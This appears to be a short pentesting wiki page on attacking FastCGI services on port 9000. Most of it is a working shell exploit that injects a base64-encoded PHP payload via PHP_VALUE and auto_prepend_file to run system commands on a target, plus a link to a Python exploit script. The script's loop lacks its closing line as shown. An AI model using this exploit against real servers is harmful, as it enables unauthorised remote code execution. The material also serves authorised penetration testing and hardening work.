2022-05-01 13:25:53 +00:00

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Basic Information

If you want to learn what is FastCGI check the following page:

{% content-ref url="pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md" %} disable_functions-bypass-php-fpm-fastcgi.md {% endcontent-ref %}

By default FastCGI run in port 9000 and isn't recognized by nmap. Usually FastCGI only listen in localhost.


It's quiet easy to make FastCGI execute arbitrary code:


PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT

or you can also use the following python script: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

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